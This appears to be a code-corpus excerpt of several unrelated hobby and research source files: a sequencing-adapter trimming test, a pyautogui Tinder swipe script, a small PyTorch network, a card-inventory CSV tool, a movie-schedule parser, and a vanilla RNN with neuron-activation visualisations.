trimmed_read = cutter(read)
assert trimmed_read.sequence == 'AAAAAAAAAAA'
assert cutter.adapter_statistics[adapter].lengths_back == {9: 1}
# We see 1 error at length 9 even though the number of allowed mismatches at
# length 9 is 0.
assert cutter.adapter_statistics[adapter].errors_back[9][1] == 1
read = Sequence('foo2', 'AAAAAAAAAAATCGAACGA')
cutter = AdapterCutter([adapter], times=1)
trimmed_read = cutter(read)
assert trimmed_read.sequence == read.sequence
assert cutter.adapter_statistics[adapter].lengths_back == {}
``` |
{
"source": "JohnCullen543/TinderSwiper",
"score": 3
} |
#### File: JohnCullen543/TinderSwiper/TinderSwiperV.3.20190508.py
```python
import pyautogui as py
data = []
def locator():
test = 'TinderHeart.png'
cent = py.locateCenterOnScreen(test)
py.moveTo(cent[0:2])
py.click(button = 'left')
def Start():
start = input('')
if start:
locator()
SwipeRight(start)
else:
pass
def SwipeRight(start):
for x in range(101):
py.press('right', interval = .3)
Start()
``` |
{
"source": "johncurcio/facebook-secure-private-ai",
"score": 4
} |
#### File: facebook-secure-private-ai/lesson 2/02_stackemup.py
```python
import torch
def activation(x):
"""
Sigmoid activation function
Arguments
---------
x: torch.Tensor
"""
return 1/(1 + torch.exp(-x))
torch.manual_seed(7) # rgn seed for randn
features = torch.randn((1, 3)) # creates a random vector/tensor 1x5
n_input = features.shape[1]
n_hidden = 2
n_output = 1
# weightd
W1 = torch.randn(n_input, n_hidden)
W2 = torch.randn(n_hidden, n_output)
# bias
B1 = torch.randn((1, n_hidden))
B2 = torch.randn((1, n_output))
# y = f(w*x + b)
# y = activation(weights*features + bias)
h = activation(torch.mm(features, W1) + B1)
y = activation(torch.mm(h, W2) + B2)
print(y)
``` |
{
"source": "johncurd91/deckbox",
"score": 4
} |
#### File: johncurd91/deckbox/deckbox.py
```python
import csv
# Search inventory for single card and count
def single_card_search():
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
user_input = input('Enter card name: ')
card_count = 0
for row in csv_reader:
if user_input == row['Name']:
card_count = int(row['Count'])
print(f'{card_count} cards named \'{user_input}\' found.')
# Search inventory using decklist for cards owned
def deck_list_search():
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
card_list = [row['Name'] for row in csv_reader]
with open('decklist.txt', 'r') as decklist_file:
decklist = decklist_file.readlines()
decklist_scrubbed = [i[2:].rstrip('\n') for i in decklist]
cards_owned = [card for card in decklist_scrubbed if card in card_list]
cards_not_owned = [card for card in decklist_scrubbed if card not in card_list]
print(f' Cards already owned: {cards_owned}')
print(f' Missing cards: {cards_not_owned}')
# Calculated total value of cards above minimum price
def total_value_min(conversion, min_price):
with open('inventory.csv', 'r') as inventory_file:
csv_reader = csv.DictReader(inventory_file, delimiter=',')
total_USD = 0
for row in csv_reader:
if float(row['Price'][1:]) * conversion >= min_price:
total_USD += (float(row['Price'][1:])) * int(row['Count'])
total_GBP = total_USD * conversion
print(f' Total value of cards above £{min_price}: £{round(total_GBP, 2)}')
total_value_min(0.81, 2)
``` |
{
"source": "johncylee/Moovee",
"score": 3
} |
#### File: ng_gh2014/data/moovee_parser.py
```python
import csv
import sys
import json
import datetime
def parse_txt(tsv_filename):
data = {}
data['items'] = []
key_list = []
with open(tsv_filename, 'r') as tsv:
for r_idx, row in enumerate(csv.reader(tsv, dialect='excel-tab')):
if r_idx is 0:
key_list = row
else:
movie = {}
for c_idx, cell in enumerate(row):
movie[key_list[c_idx]] = cell
#print cell
data['items'].append(movie)
return data
def format_data(data):
for item in data['items']:
datetime_str = item['DATE'] + ' ' + item['TIME']
duration_mins = int(item['DURATION'])
start = datetime.datetime.strptime(datetime_str, '%Y/%m/%d %H:%M')
end = start + datetime.timedelta(0, 0, 0, 0, duration_mins)
item['START_DATETIME'] = start.isoformat()
item['END_DATETIME'] = end.isoformat()
return data
def main():
data = parse_txt(sys.argv[1])
formated = format_data(data)
print (json.dumps(formated, indent = 2, ensure_ascii = False))
if __name__ == '__main__':
if len(sys.argv) > 1:
main()
else:
print ''
print '\tpython ' + sys.argv[0] + ' <FILENAME>'
``` |
{
"source": "johndah/Visualization-of-Recurrent-Neural-Networks",
"score": 2
} |
#### File: Visualization-of-Recurrent-Neural-Networks/Vanilla RNN/VisualizationOfRNN.py
```python
from __future__ import print_function
import sklearn.preprocessing
from numpy import *
from copy import *
import warnings
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter, MaxNLocator
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.offsetbox import AnchoredText
import platform
from sty import bg, RgbBg
from gensim.models import KeyedVectors
import ctypes
import re
import zipfile
import lxml.etree
from terminaltables import SingleTable
import time
import datetime
import os
import pickle
from decimal import Decimal
class VisualizeRNN(object):
def __init__(self, attributes=None):
if not attributes:
raise Exception('Dictionary argument "attributes" is required.')
self.__dict__ = attributes
# Allowing ANSI Escape Sequences for colors
if platform.system().lower() == 'windows':
stdout_handle = ctypes.windll.kernel32.GetStdHandle(ctypes.c_int(-11))
mode = ctypes.c_int(0)
ctypes.windll.kernel32.GetConsoleMode(ctypes.c_int(stdout_handle), ctypes.byref(mode))
mode = ctypes.c_int(mode.value | 4)
ctypes.windll.kernel32.SetConsoleMode(ctypes.c_int(stdout_handle), mode)
if self.word_domain:
if self.save_sentences:
self.vocabulary, self.sentences, self.K = self.load_vocabulary()
with open('./Data/vocabulary.word2VecKeyedVector', 'wb') as file:
pickle.dump(self.vocabulary, file)
with open('./Data/sentences.list', 'wb') as file:
pickle.dump(self.sentences, file)
with open('./Data/K.int', 'wb') as file:
pickle.dump(self.K, file)
elif self.load_sentences:
with open('./Data/vocabulary.word2VecKeyedVector', 'rb') as file:
self.word2vec_model = pickle.load(file)
with open('./Data/sentences.list', 'rb') as file:
self.sentences = pickle.load(file)
with open('./Data/K.int', 'rb') as file:
self.K = pickle.load(file)
else:
self.word2vec_model, input_sequence, self.K = self.load_vocabulary()
else:
input_sequence, self.char_to_ind, self.ind_to_char = self.load_characters()
self.K = len(self.ind_to_char)
if self.n_hidden_neurons == 'Auto':
self.n_hidden_neurons = self.K
n_validation = int(len(input_sequence) * self.validation_proportion)
n_training = len(input_sequence) - n_validation
input_sequence = input_sequence[:int(self.corpus_proportion*len(input_sequence))]
self.input_sequence = input_sequence[:n_training]
self.input_sequence_validation = input_sequence[n_training:]
self.weights = ['W', 'V', 'U', 'b', 'c']
self.gradients = ['dLdW', 'dLdV', 'dLdU', 'dLdB', 'dLdC']
self.num_gradients = ['gradWnum', 'gradVnum', 'gradUnum', 'gradBnum', 'gradCnum']
self.sizes = [(self.n_hidden_neurons, self.n_hidden_neurons), (self.K, self.n_hidden_neurons), \
(self.n_hidden_neurons, self.K), (self.n_hidden_neurons, 1), (self.K, 1)]
self.init_epoch = 0
self.init_iteration = 0
# Weight initialization
if self.weight_init == 'Load':
print('Loading weights...')
else:
print('Initializing weights...')
for weight, grad_index in zip(self.weights, range(len(self.gradients))):
if self.sizes[grad_index][1] > 1:
if self.weight_init == 'Load':
self.init_sigma = loadtxt(self.model_directory + 'initSigma.txt', unpack=False)
setattr(self, weight, array(loadtxt(self.model_directory + 'Weights/' + weight + ".txt", comments="#", delimiter=",", unpack=False)))
else:
if self.weight_init == 'He':
self.init_sigma = sqrt(2 / sum(self.sizes[grad_index]))
else:
self.init_sigma = 0.01
setattr(self, weight, self.init_sigma*random.randn(self.sizes[grad_index][0], self.sizes[grad_index][1]))
else:
if self.weight_init == 'Load':
self.init_sigma = loadtxt(self.model_directory + 'initSigma.txt', unpack=False)
setattr(self, weight, array([loadtxt(self.model_directory + 'Weights/' + weight + ".txt", comments="#", delimiter=",", unpack=False)]).T)
else:
setattr(self, weight, zeros(self.sizes[grad_index]))
if self.weight_init == 'Load':
self.seq_iterations = loadtxt(self.model_directory + 'seqIterations.txt', delimiter=",", unpack=False)
self.smooth_losses = loadtxt(self.model_directory + 'smoothLosses.txt', delimiter=",", unpack=False)
self.validation_losses = loadtxt(self.model_directory + 'validationLosses.txt', delimiter=",", unpack=False)
self.init_epoch = int(self.model_directory.split('epoch')[1][0])
self.init_iteration = 0 # int(self.model_directory.split('iteration')[1].split('-')[0])
self.n_hidden_neurons = int(self.model_directory.split('neurons')[1][:3])
self.eta = float(self.model_directory.split('eta-')[1][:7])
self.x0 = ' '
self.h0 = zeros((self.n_hidden_neurons, 1))
self.loss_momentum = 1e-3
def load_characters(self):
print('Loading text file "' + self.text_file + '"...')
if self.text_file[-4:] == '.zip':
with zipfile.ZipFile(self.text_file, 'r') as z:
doc = lxml.etree.parse(z.open('ted_en-20160408.xml', 'r'))
print('Extracting characters...')
input_text = '\n'.join(doc.xpath('//content/text()'))
characters = []
[characters.append(char) for sentences in input_text for char in sentences if char not in characters]
print('Unique characters:\n' + str(characters))
k = len(characters)
indicators = array(range(k))
ind_one_hot = self.to_one_hot(indicators)
char_to_ind = dict((characters[i], array(ind_one_hot[i])) for i in range(k))
ind_to_char = dict((indicators[i], characters[i]) for i in range(k))
return input_text, char_to_ind, ind_to_char
def load_vocabulary(self):
self.model_file = 'Data/glove_840B_300d.txt' # Word tokenization text
is_binary = self.model_file[-4:] == '.bin'
print('Loading model "' + self.model_file + '"...')
word2vec_model = KeyedVectors.load_word2vec_format(self.model_file, binary=is_binary)
K = size(word2vec_model.vectors, 1)
words = []
print('Loading text file "' + self.text_file + '"...')
if self.text_file[-4:] == '.zip':
with zipfile.ZipFile(self.text_file, 'r') as z:
doc = lxml.etree.parse(z.open(z.filelist[0].filename, 'r'))
print('Extracting words...')
input_text = '\n'.join(doc.xpath('//content/text()'))
words.extend(re.findall(r"\w+|[^\w]", input_text))
else:
with open(self.text_file, 'r') as f:
lines = f.readlines()
print('Extracting words...')
for line in lines:
words.extend(re.findall(r"\w+|[^\w]", line))
words.append('\n')
return word2vec_model, words, K
def get_words(self, e):
x_sequence = self.input_sequence[e:e + self.seq_length]
y_sequence = self.input_sequence[e + 1:e + self.seq_length + 1]
x = []
y = []
for i in range(len(x_sequence)):
x_word = x_sequence[i]
y_word = y_sequence[i]
try:
x.append(array([self.word2vec_model[x_word]]).T)
except KeyError:
self.word2vec_model[x_word] = random.uniform(-0.25, 0.25, self.K)
x.append(array([self.word2vec_model[x_word]]).T)
print("Word '" + x_word + "'" + ' added to model.')
try:
y.append(array([self.word2vec_model[y_word]]).T)
except KeyError:
self.word2vec_model[y_word] = random.uniform(-0.25, 0.25, self.K)
y.append(array([self.word2vec_model[y_word]]).T)
return x_sequence, y_sequence, x, y
def get_characters(self, e, input_sequence, seq_length=None):
if not seq_length:
seq_length = self.seq_length
x_sequence = input_sequence[e:e+seq_length]
y_sequence = input_sequence[e+1:e+seq_length + 1]
x = self.seq_to_one_hot(x_sequence)
y = self.seq_to_one_hot(y_sequence)
return x_sequence, y_sequence, x, y
def run_vanilla_rnn(self):
if self.weight_init == 'Load':
smooth_loss = self.smooth_losses[-1]
validation_loss = self.validation_losses[-1]
lowest_validation_loss = validation_loss
else:
smooth_loss = None
if self.word_domain:
self.domain_specification = 'Words'
else:
self.domain_specification = 'Characters'
constants = 'Max Epochs: ' + str(self.n_epochs) + ' (' + str(len(self.input_sequence)/self.seq_length * self.n_epochs) + ' seq. iter.)' \
+ '\n# Hidden neurons: ' + str(self.n_hidden_neurons) \
+ '\nWeight initialization: ' + str(self.weight_init) \
+ '\n' + r'$\sigma$ = ' + "{:.2e}".format(self.init_sigma) \
+ '\n' + r'$\eta$ = ' + "{:.2e}".format(self.eta) \
+ '\n' + 'Sequence length: ' + str(self.seq_length) \
+ '\n#' + self.domain_specification + ' in training text:' + '\n' + str(len(self.input_sequence)) \
+ '\n' + 'AdaGrad: ' + str(self.ada_grad_sgd) \
+ '\n' + 'RMS Prop: ' + str(self.rms_prop)
if self.rms_prop:
constants += '\n' + r'$\gamma$ = ' + "{:.2e}".format(self.gamma)
m = []
for weight in self.weights:
m.append(zeros(getattr(self, weight).shape))
if self.weight_init == 'Load':
seq_iteration = self.seq_iterations[-1]
seq_iterations = [s for s in self.seq_iterations]
smooth_losses = [s for s in self.smooth_losses]
validation_losses = [s for s in self.validation_losses]
else:
seq_iteration = 0
seq_iterations = []
smooth_losses = []
validation_losses = []
smooth_losses_temp = []
validation_losses_temp = []
seq_iterations_temp = []
start_time = time.time()
previous_time = start_time
for epoch in range(self.init_epoch, self.n_epochs):
h_prev = deepcopy(self.h0)
for e in range(self.init_iteration, len(self.input_sequence)-self.seq_length-1, self.seq_length):
if self.word_domain:
x_sequence, y_sequence, x, y = self.get_words(e)
else:
x_sequence, y_sequence, x, y = self.get_characters(e, self.input_sequence)
output, h, a = self.forward_prop(x, h_prev)
if (self.train_model):
self.back_prop(x, y, output, h)
loss, accuracy = self.compute_loss(output, y)
if not smooth_loss:
smooth_loss = loss
smooth_loss = (1 - self.loss_momentum) * smooth_loss + self.loss_momentum * loss
if (not self.train_model) or time.time() - previous_time > 900 or (time.time() - start_time < 5 and time.time() - previous_time > 3) or e >= len(self.input_sequence)-2*self.seq_length-1:
print("Evaluating and presenting current model..")
seq_iterations_temp.append(seq_iteration)
smooth_losses_temp.append(smooth_loss)
x0 = self.input_sequence[e]
if self.word_domain:
x_sequence, y_sequence, x, y = self.get_words(e)
else:
x_sequence, y_sequence, x, y = self.get_characters(0, self.input_sequence_validation, self.length_synthesized_text)
output, h, a = self.forward_prop(x, h_prev)
validation_loss, accuracy = self.compute_loss(output, y)
lowest_validation_loss = copy(validation_loss)
validation_losses_temp.append(validation_loss)
table, neuron_activation_map, inputs = self.synthesize_text(x0, h_prev, self.length_synthesized_text)
with open('PlotConfigurations.txt', 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split('#')[0]
if 'plot_process:' in line:
self.plot_process = ''.join(line.split()).split(':')[1] == 'True'
elif 'plot_color_map:' in line:
self.plot_color_map = ''.join(line.split()).split(':')[1] == 'True'
elif 'plot_fft:' in line:
self.plot_fft = ''.join(line.split()).split(':')[1] == 'True'
elif 'auto_detect_peak:' in line:
self.auto_detect_peak = line.split("'")[1]
if self.plot_color_map:
self.plot_neural_activity(inputs, neuron_activation_map)
if self.plot_fft:
self.plot_fft_neural_activity(neuron_activation_map)
time_passed = time.time() - start_time
estimated_total_time = time_passed/(max(e, 1)/len(self.input_sequence))
remaining_time = estimated_total_time - time_passed
previous_time = time.time()
print('\nSequence iteration: ' + str(seq_iteration) + ', Epoch: ' + str(epoch)
+ ', Epoch ETA: ' + str(datetime.timedelta(seconds=int(remaining_time)))
+ ', Epoch process: ' + str('{0:.2f}'.format(e/len(self.input_sequence)*100)) + '%'
+ ', Training loss: ' + str('{0:.2f}'.format(smooth_loss)) + ', Neuron of interest: '
+ ', Validation loss: ' + str('{0:.2f}'.format(validation_loss)) + ', Neuron of interest: ' +
str(self.neurons_of_interest) + '(/' + str(self.n_hidden_neurons) + ')')
print(table)
if self.plot_process:
fig = plt.figure(3)
plt.clf()
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.85)
anchored_text = AnchoredText(constants, loc=1)
ax.add_artist(anchored_text)
plt.title(self.domain_specification[:-1] + ' prediction learning curve of Recurrent Neural Network')
plt.ylabel('Smooth loss')
plt.xlabel('Sequence iteration')
plt.plot(seq_iterations+seq_iterations_temp, smooth_losses+smooth_losses_temp, LineWidth=2, label='Training')
plt.plot(seq_iterations+seq_iterations_temp, validation_losses+validation_losses_temp, LineWidth=2, label='Validation')
plt.grid()
plt.legend(loc='upper left')
plt.pause(.5)
if not self.train_model:
input("\nPress Enter to continue...")
else:
if validation_loss <= lowest_validation_loss:
seq_iterations += seq_iterations_temp
smooth_losses += smooth_losses_temp
validation_losses += validation_losses_temp
smooth_losses_temp = []
validation_losses_temp = []
seq_iterations_temp = []
lowest_validation_loss = copy(smooth_loss)
h_prev_best = copy(h_prev)
if self.train_model and self.save_parameters:
state = "val_loss%.3f-val_acc%.3f-loss%.3f-epoch%d-iteration%d-neurons%d-eta-"%(validation_loss, accuracy, loss, epoch, int(e/self.seq_length), self.n_hidden_neurons) + '{:.2e}'.format(Decimal(self.eta)) + "/"
try:
for weight in self.weights:
file_name = 'Vanilla RNN Saved Models/' + state + 'Weights/' + weight + '.txt'
os.makedirs(os.path.dirname(file_name), exist_ok=True)
savetxt(file_name, getattr(self, weight), delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'init_sigma.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'init_sigma.txt', array([[self.init_sigma]]))
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'seq_iterations.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'seq_iterations.txt', seq_iterations, delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'smooth_losses.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'smooth_losses.txt', smooth_losses, delimiter=',')
os.makedirs(os.path.dirname('Vanilla RNN Saved Models/' + state + 'validation_losses.txt'), exist_ok=True)
savetxt('Vanilla RNN Saved Models/' + state + 'validation_losses.txt', validation_losses, delimiter=',')
except Exception as ex:
print(ex)
print('Continuing training...')
if self.train_model:
epsilon = 1e-10
if self.rms_prop:
c_m = self.gamma
c_g = 1 - self.gamma
else:
c_m, c_g, = 1, 1
for grad, weight, grad_index in zip(self.gradients, self.weights, range(len(self.gradients))):
if self.ada_grad_sgd:
m[grad_index] = c_m * m[grad_index] + c_g*getattr(self, grad)**2
sqrt_inv_m = (m[grad_index]+epsilon)**-0.5
updated_weight = getattr(self, weight) - self.eta * multiply(sqrt_inv_m, getattr(self, grad))
else:
updated_weight = deepcopy(getattr(self, weight)) - self.eta * deepcopy(getattr(self, grad))
setattr(self, weight, updated_weight)
h_prev = deepcopy(h[-1])
seq_iteration += 1
def plot_neural_activity(self, inputs, neuron_activation_map):
with open('FeaturesOfInterest.txt', 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split('#')[0]
if 'Prediction features:' in line:
feature = line.split(':')[1].split("'")[1]
break
try:
input_indices_of_interest = []
inputs_of_interest = []
for i in range(len(inputs)):
if bool(re.fullmatch(r''.join(feature), inputs[i])):
input_indices_of_interest.append(i)
if inputs[i] == '\n':
inputs[i] = '\\n'
inputs_of_interest.append('"' + inputs[i] + '"')
except Exception as ex:
print(ex)
if len(inputs_of_interest) > 20:
inputs_of_interest = [' ']*len(inputs_of_interest)
elif len(input_indices_of_interest) < 1:
warnings.warn('The feature of interest is not found in generated sequence')
return False;
f, axarr = plt.subplots(1, 2, num=1, gridspec_kw={'width_ratios': [5, 1]}, clear=True)
axarr[0].set_title('Colormap of hidden neuron activations')
feature_label = 'Feature: "' + feature + '"'
if not self.word_domain and feature == '.':
feature_label = 'Feature: ' + '$\it{Any}$'
x = range(len(inputs_of_interest))
axarr[0].set_xticks(x)
axarr[0].set_xlabel('Predicted sequence (' + feature_label + ')')
axarr[0].set_xticklabels(inputs_of_interest, fontsize=7, rotation=90 * self.word_domain)
axarr[1].set_xticks([])
if self.auto_detect_peak == 'Relevance':
neuron_activation_rows = neuron_activation_map
else:
neuron_activation_rows = neuron_activation_map[self.neurons_of_interest_plot, :]
max_activation = amax(neuron_activation_map)
min_activation = amin(neuron_activation_map)
input_indices_of_interest_conjugate = list(set(range(len(inputs))) - set(input_indices_of_interest))
neuron_feature_extracted_map = flip(neuron_activation_rows[:, input_indices_of_interest], axis=0)
neuron_feature_remaining_map = flip(neuron_activation_rows[:, input_indices_of_interest_conjugate], axis=0)
before_action_potential = array(input_indices_of_interest) - 1
after_action_potential = array(input_indices_of_interest) + 1
before_action_potential[array(input_indices_of_interest) - 1 == -1] = 1
after_action_potential[array(input_indices_of_interest) + 1 == size(neuron_activation_rows, 1)] = size(
neuron_activation_rows, 1) - 2
prominences = 2 * neuron_activation_rows[:, input_indices_of_interest] - neuron_activation_rows[:, before_action_potential] - neuron_activation_rows[:,after_action_potential]
prominence = atleast_2d(mean(abs(prominences), axis=1)).T
extracted_mean = array([mean(neuron_feature_extracted_map, axis=1)]).T
remaining_mean = array([mean(neuron_feature_remaining_map, axis=1)]).T
difference = atleast_2d(mean(abs(extracted_mean - remaining_mean), axis=1)).T
score = prominence + difference
relevance = score / amax(score)
if self.auto_detect_peak == 'Relevance':
reduced_window_size = 10
argmax_row = where(relevance == amax(relevance))[0][0]
neuron_window = [0]*2
neuron_window[0] = max(argmax_row - int(reduced_window_size / 2), 0)
neuron_window[1] = min(argmax_row + int(reduced_window_size / 2 + 1), size(relevance, 0))
relevance = relevance[neuron_window[0]:neuron_window[1], :]
neurons_of_interest_relevance = range(neuron_window[0], neuron_window[1])
print('\nAuto-detected relevance peak for feature "' + feature + '":')
print('Neuron: ' + str(argmax_row))
print('Value: ' + str(amax(relevance)) + '\n')
neuron_activation_rows = neuron_activation_map[neurons_of_interest_relevance, :]
neuron_feature_extracted_map = flip(neuron_activation_rows[:, input_indices_of_interest], axis=0)
self.intervals_to_plot = []
self.interval_limits = []
interval = [str(neuron_window[0]), str(neuron_window[1])]
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K - 1))
self.neurons_of_interest_plot.extend(range(int(interval[0]), int(interval[-1]) + 1))
self.neurons_of_interest_plot_intervals.append(range(int(interval[0]), int(interval[-1]) + 1))
intermediate_range = [i for i in range(int(interval[0]) + 1, int(interval[-1]))]
intermediate_range.insert(0, int(interval[0]))
intermediate_range.append(int(interval[-1]))
intermediate_range_str = [str(i) for i in intermediate_range]
intermediate_range_str[-1] += self.interval_label_shift
self.intervals_to_plot.extend(intermediate_range_str)
self.interval_limits.extend(intermediate_range)
self.interval_limits = array(self.interval_limits)
self.neurons_of_interest_plot = range(neuron_window[0], neuron_window[1])
y = range(len(self.neurons_of_interest_plot))
intervals = [
self.intervals_to_plot[where(self.interval_limits == i)[0][0]] if i in self.interval_limits else ' ' for i
in self.neurons_of_interest_plot]
for i in range(len(axarr)):
axarr[i].set_yticks(y)
axarr[i].set_yticklabels(flip(intervals), fontsize=7)
axarr[0].set_ylabel('Neuron')
colmap = axarr[0].imshow(neuron_feature_extracted_map, cmap='coolwarm', interpolation='nearest', aspect='auto',
vmin=min_activation, vmax=max_activation)
colmap = axarr[1].imshow(relevance,
cmap='coolwarm', interpolation='nearest', aspect='auto', vmin=min_activation, vmax=max_activation)
axarr[1].set_title('Relevance')
if self.auto_detect_peak != 'Relevance':
interval = 0
for i in range(len(self.neurons_of_interest_plot_intervals) + 1):
if i > 0:
limit = self.neurons_of_interest_plot_intervals[i - 1]
interval += 1 + limit[-1] - limit[0]
axarr[0].plot(arange(-.5, len(input_indices_of_interest) + .5),
(len(input_indices_of_interest) + 1) * [interval - 0.5], 'k--', LineWidth=1)
f.colorbar(colmap, ax=axarr.ravel().tolist())
plt.pause(.1)
return True
def plot_fft_neural_activity(self, neuron_activation_map):
neurons_of_interest_fft = range(16, 21)
if self.auto_detect_peak != 'FFT':
neuron_activations = neuron_activation_map[neurons_of_interest_fft, :]
else:
neuron_activations = neuron_activation_map
fft_neuron_activations_complex = fft.fft(neuron_activations)
fft_neuron_activations_abs = abs(fft_neuron_activations_complex / self.length_synthesized_text)
fft_neuron_activations_single_sided = fft_neuron_activations_abs[:, 0:int(self.length_synthesized_text / 2)]
fft_neuron_activations_single_sided[:, 2:-2] = 2 * fft_neuron_activations_single_sided[:, 2:-2]
freq = arange(0, floor(self.length_synthesized_text / 2)) / self.length_synthesized_text
if self.auto_detect_peak == 'FFT':
self.band_width = [0.1, 0.4]
start_neuron_index = 0
neuron_window = [start_neuron_index] * 2
reduced_window_size = 10
domain_relevant_freq = (freq > self.band_width[0]) & (freq < self.band_width[1])
# freq = freq[domain_relevant_freq]
domain_relevant_components = fft_neuron_activations_single_sided[:, domain_relevant_freq]
argmax_row = where(fft_neuron_activations_single_sided == amax(domain_relevant_components))[0][0]
neuron_window[0] += max(argmax_row - int(reduced_window_size / 2), 0)
neuron_window[1] += min(argmax_row + int(reduced_window_size / 2 + 1), size(domain_relevant_components, 0))
fft_neuron_activations_single_sided = fft_neuron_activations_single_sided[
neuron_window[0] - start_neuron_index:neuron_window[
1] - start_neuron_index, :]
neurons_of_interest_fft = range(neuron_window[0], neuron_window[1])
print('\nAuto-detected FFT periodicity peak in band width interval ' + str(self.band_width) + ':')
print('Neuron: ' + str(argmax_row))
print('Value: ' + str(amax(domain_relevant_components)) + '\n')
neurons_of_interest_fft, freq = meshgrid(neurons_of_interest_fft, freq)
fig = plt.figure(2)
plt.clf()
ax = fig.gca(projection='3d')
ax.view_init(20, -120)
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
cmap_color = cm.coolwarm # cm.coolwarm
surf = ax.plot_surface(freq, neurons_of_interest_fft, fft_neuron_activations_single_sided.T, rstride=1,
cstride=1, cmap=cmap_color, linewidth=0,
antialiased=False)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.zaxis.set_rotate_label(False)
plt.title('Fourier Amplitude Spectrum of Neuron Activation')
plt.xlabel('Frequency')
plt.ylabel('Neurons of interest')
ax.set_zlabel(r'$|\mathcal{F}|$')
plt.pause(.5)
def forward_prop(self, x, h_prev, weights={}):
if not weights:
weights_tuples = [(self.weights[i], getattr(self, self.weights[i])) for i in range(len(self.weights))]
weights = dict(weights_tuples)
tau = len(x)
h = [h_prev]
a = []
o = []
if not self.word_domain:
p = []
for t in range(0, tau):
a.append(dot(weights['W'], h[t]) + dot(weights['U'], x[t]) + weights['b'])
h.append(self.tanh(a[t]))
if self.word_domain:
o.append(dot(weights['V'], h[t+1]) + weights['c'])
else:
o = dot(weights['V'], h[t+1]) + weights['c']
p.append(self.softmax(o))
if self.word_domain:
return o, h, a
else:
return p, h, a
def synthesize_text(self, x0, h_prev, seq_length, weights={}):
if not weights:
weights_tuples = [(self.weights[i], getattr(self, self.weights[i])) for i in range(len(self.weights))]
weights = dict(weights_tuples)
self.neurons_of_interest = []
self.neurons_of_interest_plot = []
self.neurons_of_interest_plot_intervals = []
self.load_neuron_intervals()
print('Predicting sentence from previous ' + self.domain_specification[:-1].lower() + ' "' + x0 + '"')
table_data = [['Neuron ' + str(self.neurons_of_interest[int(i/2)]), ''] if i % 2 == 0 else ['\n', '\n'] for i in range(2*len(self.neurons_of_interest))]
table = SingleTable(table_data)
table.table_data.insert(0, ['Neuron ', 'Predicted sentence'])
max_width = table.column_max_width(1)
y_n = [[] for i in range(len(self.neurons_of_interest))]
y = [[] for i in range(len(self.neurons_of_interest))]
if self.word_domain:
x = [array([self.word2vec_model[x0]]).T]
else:
sample = copy(x0)
neuron_activation_map = zeros((self.n_hidden_neurons, seq_length))
for t in range(seq_length):
if not self.word_domain:
x = self.seq_to_one_hot(sample)
output, h, a = self.forward_prop(x, h_prev, weights)
h_prev = deepcopy(h[-1])
neuron_activation_map[:, t] = a[-1][:, 0]
neuron_activations = a[-1][self.neurons_of_interest]
if self.word_domain:
output_word_vector = output[0][:, 0]
list_most_similar = self.word2vec_model.most_similar(positive=[output_word_vector], topn=200)
similarities = array([list_most_similar[i][1] for i in range(len(list_most_similar))])
p = similarities[similarities > 0]/sum(similarities[similarities > 0])
else:
p = output[-1]
cp = cumsum(p)
rand = random.uniform()
diff = cp - rand
sample_index = [i for i in range(len(diff)) if diff[i] > 0]
if sample_index:
sample_index = sample_index[0]
else:
sample_index = len(diff) - 1
if self.word_domain:
sample = list_most_similar[sample_index][0]
else:
sample = self.ind_to_char.get(sample_index)
for i in range(len(self.neurons_of_interest)):
neuron_activation = nan_to_num(neuron_activations[i, 0])/20.0
active_color = abs(int(neuron_activation * 255)) if self.dark_theme else 255
inactive_color = 0 if self.dark_theme else 255 - abs(int(neuron_activation * 255))
if neuron_activation > 0:
red = active_color
green = inactive_color
blue = inactive_color
else:
red = inactive_color
green = inactive_color
blue = active_color
bg.set_style('activationColor', RgbBg(red, green, blue))
colored_word = bg.activationColor + sample + bg.rs
y_n[i].append(sample)
y[i].append(colored_word)
for i in range(len(self.neurons_of_interest)):
wrapped_string = ''
line_width = 0
for j in range(len(y[i])):
table_row = y[i][j]
if '\n' in table_row:
wrapped_string += table_row.split('\n')[0] + '\\n' + table_row.split('\n')[1] + '\n'
line_width = 0
wrapped_string += ' ' * (max_width - line_width) * 0 + '\n'
else:
wrapped_string += ''.join(y[i][j])
line_width += len(y_n[i][j])
if line_width > max_width - 10:
line_width = 0
wrapped_string += ' '*(max_width - line_width)*0 + '\n'
table.table_data[2*i+1][1] = wrapped_string
max_activation = amax(neuron_activation_map[self.neurons_of_interest, :])
min_activation = amin(neuron_activation_map[self.neurons_of_interest, :])
margin = 8
color_range_width = max_width - len(table.table_data[0][1]) - (len(str(max_activation)) + len(str(min_activation)) + 2)
color_range = arange(min_activation, max_activation,
(max_activation - min_activation) / color_range_width)
color_range_str = ' '*margin + str(round(min_activation, 1)) + ' '
for i in range(color_range_width):
color_range_value = nan_to_num(color_range[i])/20.0
active_color = abs(int(color_range_value * 255)) if self.dark_theme else 255
inactive_color = 0 if self.dark_theme else 255 - abs(int(color_range_value * 255))
if color_range_value > 0:
red = active_color
green = inactive_color
blue = inactive_color
else:
red = inactive_color
green = inactive_color
blue = active_color
bg.set_style('activationColor', RgbBg(red, green, blue))
colored_indicator = bg.activationColor + ' ' + bg.rs
color_range_str += colored_indicator
color_range_str += ' ' + str(round(max_activation, 1))
table.table_data[0][1] += color_range_str
table.table_data[1:] = flip(table.table_data[1:], axis=0)
return table.table, neuron_activation_map, y_n[0]
def load_neuron_intervals(self):
with open('FeaturesOfInterest.txt', 'r') as f:
lines = f.readlines()
for line in lines:
